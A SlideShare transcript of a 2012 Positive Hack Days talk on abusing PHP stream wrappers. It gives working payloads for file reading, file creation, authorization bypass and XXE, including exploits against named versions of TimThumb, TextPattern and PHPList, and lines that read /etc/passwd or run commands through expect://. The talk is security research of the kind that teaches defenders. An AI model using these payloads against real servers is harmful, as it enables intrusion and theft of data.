SlideShare a Scribd company logo

On secure application of PHP wrappers

Download as PPTX, PDF
Positive Hack Days
Positive Hack Days
Technology
1 of 29
PHP Wrappers Aleksey Moskvin Positive Technologies May 2012
Streams Streams
Data reading Wrappers $handle = fopen($file, "rb"); while (!feof($handle)) { $contents .= fread($handle, 8192); } fclose($handle); You can get data not only from local files! $file = 'ftp://user:password@10.0.0.1/pub/file.txt'; $file = „http://127.0.0.1/server-status‟; $file = „php://fd/XXX‟; $file = „expect://ls‟;
Data writing Read the file copy ('/etc/passwd' , 'php://output'); file_put_contents(„php://output', file_get_contents('/etc/hosts')); Modify the file, and then write it to the disk move_uploaded_file($_FILES[“attach”]["tmp_name"], “php://filter/string.rot13/resource=./upload/user_attach”); Write data into Apache error_log (PHP >= 5.3.6) error_log („Bypass root perm!‟, 3, „php://fd/2‟);
Wrapper zip:// Requirements: PHP is compiled with zip support. You can use zip:// wrapper in case allow_url_fopen = Off. zip:// wrapper allows you to access file inside the archive with an arbitrary name. $zip = new ZipArchive; if ($zip->open('/tmp/any_name_zip_arxiv',1) ) { $zip->addFromString( '/my/header.html', '<?php print_r(ini_get_all());„ ); } $zip->close(); print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
NULL Byte Replacement $s = $_POST[„path‟]; include $s.‟/header.html‟; allow_url_include directive restricts the usage of http:// ftp:// data:// wrappers. magic_quotes_gpc directive restricts the usage of NULL byte in local files including. If you can create a zip archive, you can use zip:// wrapper: path=zip:///tmp/any_name_zip_arxiv#/my This is effective if allow_url_fopen=Off and magic_quotes_gpc=On An arbitrary archive name allows you to use temporary files created while content loading. Use hpinfo() to get temporary file path: https://rdot.org/forum/showthread.php?t=1134
Wrapper data:// (RFC 2397) According to RFC 2379, data:// wrapper supports more extended syntax: dataurl := "data:" [ mediatype ] [ ";base64" ] "," data mediatype := [ type "/" subtype ] *( ";" parameter ) data := *urlchar parameter := attribute "=" value Wrapper feature: mediatype can be absent or can be filled in by arbitrary values: data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
Trick: function stream_get_meta_data Modify array items returned by stream_get_meta_data $password = 'secret'; $file = $_POST['file']; $fp = fopen( $file, 'r'); extract(stream_get_meta_data($fp)); if ( $mediatype === 'text/plain') { ... } if ( $_COOKIE['admin'] === $password) { ... } Rewrite $password variable POST DATA: file=data://text/plain;password=mysecret;base64, Bypass authorization: Cookie: admin=mysecret
Wrapper compress.zlib:// compress.zlib:// wrapper does not modify ordinary file content readfile('compress.zlib:///etc/hosts'); Local file path can include arbitrary folders name $url = 'compress.zlib:///http://../etc/hosts'; if (preg_match('/http:///', $url) == true) { echo "Yes!"; }
Any Data in parse_url parse_url function handles not only URLs $url_info = parse_url($_POST[„src‟]); if ($url_info['host'] === 'img.youtube.com') { $name = str_replace('/', '', substr($url_info['path'], 4)); copy( $src, './'.$name ); } Loading images from img.youtube.com: POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg Bypass host name checks and create arbitrary files: POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo Local File Manipulation: POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
Bypass preg_match validate Filter bypass based on preg_match POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file function validate_url ($url) { $pattern = "/b(?:(?:https?)://|www.)[-a-z0-9+&@#/%?=~_|!:,.;]*[-a-z0-9+&@#/%=~_|]/i"; return preg_match ($pattern, $url); } $src = $_POST['src']; if (!validate_url ($src)) display_error ('invalid url');
Arbitrary File Loading in TimThumb TimThumb is a popular script used for image resize. Public Exploit for v 1.32 (08/2011): http://www.exploit-db.com/exploits/17602 New Wrappers Exploit for v1.34 (revision 145) function check_external ($src) { ………………… if (!validate_url ($src)) display_error ('invalid url'); $url_info = parse_url ($src); ................... if ($url_info['host'] == 'www.youtube.com' || …) parse_str($url_info['query']); .................. $fh = fopen($local_filepath, „w‟); $ch = curl_init($src); ………………….. $files_infos = getimagesize ($local_filepath); if (empty($file_infos[„mime‟]) || …..) unlink($local_filepath); ……………………………… http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php &url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
File Manipulation in TimThumb v1.35 Requirements: curl_init function is diabled on the target server. ………………… if (!$img = file_get_contents ($src)) { display_error ('error....'); } if (file_put_contents ($local_filepath, $img) == FALSE) неопределенного фильтра does not influence the results of other filters { display_error ('error.....'); } ………………… Create a file with arbitrary content: data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo «Read» local file: compress.zlib://youtube.com/../http://?/../../path/to/local/file
Secret features of php://filter wrapper php://filter allows users to filter streams while opening. Filter the file content: readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php'); Unknown filter does not influence the results of other filters. convert.base64-decode and string.strip_tags filters can delete data from the stream. Stephan Esser used convert.base64-decode filter features in an exploit for Piwik in 2009: http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability Since 2009, two important questions are not solved: How to delete «unused» data? What are the advantages of filters?
Base64 algorithm: encoding RFC 2045, section 6.8 describes Base64 algorithm. Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Base64 algorithm: decoding While decoding, only characters of base64 alphabet are handled. The input string is divided into parts by 4 characters, every part is handled separately.
Example. “Instrusion” of stopper You can delete some data using base64_decode several times. $content = "; <? die; ?>n"; $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]n"; $file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode /resource=./PoC'; file_put_contents($file, $content); “Stub”: /Ly8v ( base64_decode('Ly8v') == '///‟ ) convert.base64-decode filter does not handle strings with equal sign in the middle. $s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
Filter string.strip_tags Filter string.strip_tags speeds up the “extrusion” process $content = "; <? die; ?>n"; $content .= "=3C=3Fprint('PHP');n"; $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC'; $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C file_put_contents($file, $content); convert.quoted-printable-decode filter handles strings symbol by symbol. Characters in Quoted-Printable ( RFC2045, 6.7 chapter) format are modified into characters of 8 bit code page. Modification into Quoted-Printable format. $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); convert.quoted-printable-decode filter is not effective if the string does not include an equal sign followed by hexadecimal character code. $s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
TextPattern: Upload Arbitrary Files (I) File with .php extension stores information about comments‟ authors. $file = $prefs['tempdir'].DS.'evaluator_trace.php'; if (!file_exists($file)) { $fp = fopen($file, 'wb'); if ($fp) fwrite($fp, "<?php return; ?>n". "This trace-file tracks saved comments. (created ". Пп safe_strftime($prefs['archive_dateformat'],time()).")n". "Format is: Type; Probability; Message “ . “(Type can be -1 => spam, 0 => moderate, 1 => visible)nn");
TextPattern: Upload Arbitrary Files (I)
Partial File Reading in PHPList <= 2.10.13 (I) The reason is a possibility to modify the structure of $_FILES array http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/ if (is_array($_FILES)) { ## only avatars are files foreach ($_FILES['attribute']['name'] as $key => $val) { if (!empty($_FILES['attribute']['name'][$key])) { $tmpnam = $_FILES['attribute']['tmp_name'][$key]; $size = $_FILES['attribute']['size'][$key]; if ($size < MAX_AVATAR_SIZE) { $avatar = file_get_contents($tmpnam); Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar))); The follow HTML form allows an attacker to upload files into a database. <form action="http://localhost/lists/admin/?page=user&id=1" method="POST” enctype="multipart/form-data" > <input type="file" name="attribute[tmp_name]["> <input type="file" name="attribute[size]["> <input type="file" name="attribute[[tmp_name]"> <input type="file" name="attribute[name]["> <input name="change" value="Save Changes" type="submit"> </form>
Partial File Reading in PHPList <= 2.10.13 (II)
getimagesize check bypass (I) With filters, you manage not only to delete stoppers but also modify images checked on the basis of getimagesize function. If you manage to inject data into EXIF image
getimagesize check bypass (II) extract($_REQUEST); ….. include $templatedir.'/header.html'; ..... if (!empty($_FILES) ) { $file_info = getimagesize($_FILES['image']['tmp_name']); if($file_info['mime'] == 'image/jpeg') { if ( move_uploaded_file( $_FILES['image']['tmp_name'], $folder.'/avatar.jpg') ) ...... Load an image, but a zip archive with /my/header.html file is stored on the server. folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/ Add the file into the zip archive templatedir=zip:///tmp/avatar.jpg#/my
Files with arbitrary content If you manage to create a file with arbitrary content, you can: create a session file and exploit the unserialize bug via session_start(); create a zip archive and exploit RFI; create/rewrite files htaccess/htpasswd; create or rewrite templates.
parse_ini_file atack parse_ini_file function handles local files only. session_start(); $_SESSION['admin'] = $_POST['name']; ....... $var = parse_ini_file($inifile); require $var['require']; Create session file /tmp/sess_dffdsdf24gssdgsd90 admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5" With filters, transform the session file into format suitable for parse_ini_file function. php://filter/read=convert.base64-decode|convert.base64-decode| convert.base64-decode/resource= /tmp/sess_dffdsdf24gssdgsd90
XXE Attack Read files via XML Injection. <?xml version='1.0'?> <!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64- encode/resource=http://127.0.0.1/server-status"> ]> <scan>&test;</scan> simplexml_load_file function and DOMDocument::load method supports wrappers.
Limitations for the usage of wrappers By default, you are not allowed to use wrappers in includes with installed Suhosin (even if allow_url_include = On). For example, zip:// wrapper is available as soon as whitelist includes it: suhosin.executor.include.whitelist = “zip” file_exists, is_file, filesize functions return FALSE in case wrappers php://filter, zip://, data:// are used as file names.
Thank you for your attention! Questions?

Recommended

C99[2]
C99[2]C99[2]
C99[2]guest8914af
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
08 php-files
08 php-files08 php-files
08 php-fileshoangphuc2587
 
Intro to php
Intro to phpIntro to php
Intro to phpSp Singh
 
Intro to PHP
Intro to PHPIntro to PHP
Intro to PHPSandy Smith
 
Introducing PHP Data Objects
Introducing PHP Data ObjectsIntroducing PHP Data Objects
Introducing PHP Data Objectswebhostingguy
 
Ch3(working with file)
Ch3(working with file)Ch3(working with file)
Ch3(working with file)Chhom Karath
 
PHP5.5 is Here
PHP5.5 is HerePHP5.5 is Here
PHP5.5 is Herejulien pauli
 

Recommended

C99[2]
C99[2]C99[2]
C99[2]guest8914af
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
08 php-files
08 php-files08 php-files
08 php-fileshoangphuc2587
 
Intro to php
Intro to phpIntro to php
Intro to phpSp Singh
 
Intro to PHP
Intro to PHPIntro to PHP
Intro to PHPSandy Smith
 
Introducing PHP Data Objects
Introducing PHP Data ObjectsIntroducing PHP Data Objects
Introducing PHP Data Objectswebhostingguy
 
Ch3(working with file)
Ch3(working with file)Ch3(working with file)
Ch3(working with file)Chhom Karath
 
PHP5.5 is Here
PHP5.5 is HerePHP5.5 is Here
PHP5.5 is Herejulien pauli
 
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebookguoqing75
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証ME iBotch
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overviewjsmith92
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Serverwebhostingguy
 
extending-php
extending-phpextending-php
extending-phptutorialsruby
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐいHisateru Tanaka
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model Perforce
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128PrinceGuru MS
 
Cod
CodCod
CodStan Adrian
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linuxtutorialsruby
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Perl basics for pentesters part 2
Perl basics for pentesters part 2Perl basics for pentesters part 2
Perl basics for pentesters part 2n|u - The Open Security Community
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Developmentjsmith92
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themSérgio Rafael Siqueira
 
eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedBertrand Dunogier
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration managementAlexander Tkachev
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with AugeasPuppet
 
Augeas @RMLL 2012
Augeas @RMLL 2012Augeas @RMLL 2012
Augeas @RMLL 2012Raphaël PINSON
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedBertrand Dunogier
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking Sebastian Marek
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewDan Morrill
 

More Related Content

What's hot

Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebookguoqing75
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証ME iBotch
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overviewjsmith92
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Serverwebhostingguy
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐいHisateru Tanaka
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model Perforce
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128PrinceGuru MS
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linuxtutorialsruby
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Developmentjsmith92
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themSérgio Rafael Siqueira
 

What's hot (15)

Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuMengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntu
 
4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook4069180 Caching Performance Lessons From Facebook
4069180 Caching Performance Lessons From Facebook
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証
 
PHP 5.3 Overview
PHP 5.3 OverviewPHP 5.3 Overview
PHP 5.3 Overview
 
Lesson 9. The Apache Web Server
Lesson 9. The Apache Web ServerLesson 9. The Apache Web Server
Lesson 9. The Apache Web Server
 
extending-php
extending-phpextending-php
extending-php
 
関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい関西PHP勉強会 php5.4つまみぐい
関西PHP勉強会 php5.4つまみぐい
 
Perforce Object and Record Model
Perforce Object and Record Model Perforce Object and Record Model
Perforce Object and Record Model
 
Php tips-and-tricks4128
Php tips-and-tricks4128Php tips-and-tricks4128
Php tips-and-tricks4128
 
Cod
CodCod
Cod
 
mapserver_install_linux
mapserver_install_linuxmapserver_install_linux
mapserver_install_linux
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
 
Perl basics for pentesters part 2
Perl basics for pentesters part 2Perl basics for pentesters part 2
Perl basics for pentesters part 2
 
SPL: The Missing Link in Development
SPL: The Missing Link in DevelopmentSPL: The Missing Link in Development
SPL: The Missing Link in Development
 
PSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore themPSR-7 and PSR-15, why can't you ignore them
PSR-7 and PSR-15, why can't you ignore them
 

Similar to On secure application of PHP wrappers

eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedBertrand Dunogier
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration managementAlexander Tkachev
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with AugeasPuppet
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedBertrand Dunogier
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking Sebastian Marek
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewDan Morrill
 
vfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsvfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsFrank Kleine
 
Building Lithium Apps
Building Lithium AppsBuilding Lithium Apps
Building Lithium AppsNate Abele
 
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionLithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionNate Abele
 
Advanced symfony Techniques
Advanced symfony TechniquesAdvanced symfony Techniques
Advanced symfony TechniquesKris Wallsmith
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confooterry chay
 
Symfony internals [english]
Symfony internals [english]Symfony internals [english]
Symfony internals [english]Raul Fraile
 

Similar to On secure application of PHP wrappers (20)

eZ Publish Cluster Unleashed
eZ Publish Cluster UnleashedeZ Publish Cluster Unleashed
eZ Publish Cluster Unleashed
 
Drupal 8 configuration management
Drupal 8 configuration managementDrupal 8 configuration management
Drupal 8 configuration management
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with Augeas
 
Augeas @RMLL 2012
Augeas @RMLL 2012Augeas @RMLL 2012
Augeas @RMLL 2012
 
eZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisitedeZ Publish cluster unleashed revisited
eZ Publish cluster unleashed revisited
 
vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking vfsStream - effective filesystem mocking
vfsStream - effective filesystem mocking
 
AWS Hadoop and PIG and overview
AWS Hadoop and PIG and overviewAWS Hadoop and PIG and overview
AWS Hadoop and PIG and overview
 
Tutorial Puppet
Tutorial PuppetTutorial Puppet
Tutorial Puppet
 
Frontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and HowFrontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and How
 
vfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent testsvfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent tests
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
extending-php
extending-phpextending-php
extending-php
 
Building Lithium Apps
Building Lithium AppsBuilding Lithium Apps
Building Lithium Apps
 
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo EditionLithium: The Framework for People Who Hate Frameworks, Tokyo Edition
Lithium: The Framework for People Who Hate Frameworks, Tokyo Edition
 
Advanced symfony Techniques
Advanced symfony TechniquesAdvanced symfony Techniques
Advanced symfony Techniques
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confoo
 
Symfony internals [english]
Symfony internals [english]Symfony internals [english]
Symfony internals [english]
 

More from Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Recently uploaded

What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
